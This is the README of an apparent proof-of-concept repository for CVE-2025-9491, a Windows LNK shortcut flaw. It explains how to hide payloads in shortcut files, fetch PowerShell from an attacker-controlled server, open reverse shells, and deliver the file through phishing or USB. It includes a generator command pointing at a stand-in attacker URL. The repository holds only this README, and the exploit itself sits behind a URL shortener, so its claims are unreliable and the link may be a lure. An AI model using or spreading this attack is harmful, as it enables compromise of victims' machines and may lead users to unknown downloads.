CVE-2025-9491 PoC — Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability

Source

Associated Vulnerability

Readme

# Proof-of-Concept exploit for the LNK file vulnerability (CVE-2025-9491).

## Overview
This repository contains an PoC exploit for CVE-2025-9491, a remote code execution (RCE) vulnerability in Microsoft Windows caused by LNK file UI misrepresentation. The PoC exploit enables attackers to craft .LNK files that conceal malicious payloads from the Windows user interface, allowing arbitrary code execution on the target system when the file is opened.

**Important Disclaimer:** This PoC exploit is provided strictly for educational and security research purposes. Use it only in isolated test environments, such as virtual machines, with explicit permission. Do not deploy this in production or for unauthorized activities. The maintainer assumes no liability for misuse. Always adhere to ethical hacking guidelines and legal standards.


## Affected Systems
- Microsoft Windows 10 (builds 19041 and newer)
- Microsoft Windows 11 (all builds up to 23H2)
- Microsoft Windows Server 2016, 2019, and 2022


## Exploit Details
CVE-2025-9491 exploits a flaw in Windows .LNK file parsing, where manipulated structures in the ShellLinkHeader, LinkTargetIDList, and ExtraData blocks allow hidden command execution. This results in remote code execution (RCE) by tricking users into interacting with a seemingly harmless shortcut file.

### Key Exploit Mechanics:
- **UI Deception**: The .LNK file is crafted to display benign properties (e.g., icon, description, target path) in Windows Explorer, Properties dialog, or tooltips, while embedding invisible payloads. This uses techniques like offset overflows, null-byte injections, and malformed string terminators to bypass visual inspections.
  
- **RCE Payload Delivery**: Upon double-clicking the file, Windows executes the hidden commands in the context of the current user. The exploit can:
  - Download and run remote scripts (e.g., via PowerShell from a C2 server).
  - Inject shellcode to spawn processes like cmd.exe or powershell.exe with arbitrary arguments.
  - Achieve persistence by writing to startup locations or registry keys.

- **Attack Vector**: Delivered through phishing (email attachments, malicious downloads), drive-by downloads, or shared network folders. Requires user interaction, but social engineering makes it highly effective for targeted RCE.

This PoC exploit demonstrates full RCE by executing a remote payload that establishes a reverse shell, allowing command-and-control over the victim's machine. It has been tested on unpatched systems, achieving code execution without alerts from default Windows Defender configurations.

## Requirements
- Python 3.10 or higher
- A vulnerable Windows target for testing (unpatched pre-August 2025)

## Usage
1. Enter the directory:
   ```
   cd CVE-2025-9491
   ```
2. Generate the exploit .LNK:
   ```
   python3 generate-exploit.py --output exploit.lnk --payload-url "http://attacker.com/malicious.ps1" --target "C:\Windows\System32\notepad.exe" --rce-mode
   ```
   - `--output`: Path for the generated .LNK file.
   - `--payload-url`: URL to a remote payload (e.g., PowerShell script for RCE).
   - `--target`: Visible target to masquerade as in the UI.
   - `--rce-mode`: Enables full RCE with hidden execution flags.

3. Deliver the .LNK to the target (e.g., via email or USB). When opened, it triggers RCE by fetching and executing the remote payload silently.

## Exploit

[href](https://tinyurl.com/bde9tba4)

For any inquiries, please email me at: trannguyennam65@gmail.com

File Snapshot

 [4.0K]  /data/pocs/8d081785f1eba4651e151b8a14bf28ce853d6aca
└── [3.4K]  README.md

0 directories, 1 file

Remarks